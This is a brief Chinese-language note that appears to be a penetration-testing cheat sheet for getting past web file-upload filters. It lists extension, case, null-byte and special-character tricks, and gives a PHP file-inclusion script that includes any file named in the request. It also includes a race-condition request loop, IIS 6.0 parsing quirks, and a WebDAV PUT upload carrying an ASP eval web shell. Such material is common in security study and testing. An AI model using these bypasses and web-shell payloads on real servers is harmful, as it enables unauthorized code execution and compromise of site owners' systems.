绕过方法
去除前端js认证
修改mime-type类型
添加空格绕过 php
修改文件后缀名 php2、php3、phtml
大小写混淆绕过 PhP
点号绕过 php.
特殊符号绕过 php::$DATA
路径绕过 php. .
双写绕过 pphphp
%00绕过 php%00(php5.3以下版本且关闭GPC)
文件包含先上传包含文件file.php
<?php if($_GET){ include($_GET["file"]); } else{ echo "not het args file"; } ?>
再上传shell文件用文件包含访问含GIF98A的.jpg文件
file.php?file=1.jpg
竞争
编写脚本一直访问网页
import requests while True: requests.get("url")
启动脚本,然后上传文件
IIS6.0漏洞
解析
*.asa *.asp目录里的文件都会被解析
*.asp;test.jpg
<%=NOW()%>
PUT漏洞
PUT启动
开启webDAV,给予写入权限
<%eval request("cmd")%>
OPTIONS查看请求类型
PUT上传文件
COPY修改文件
文件后缀
.asa
.cer
.cdx
后缀文件会被解析为asp文件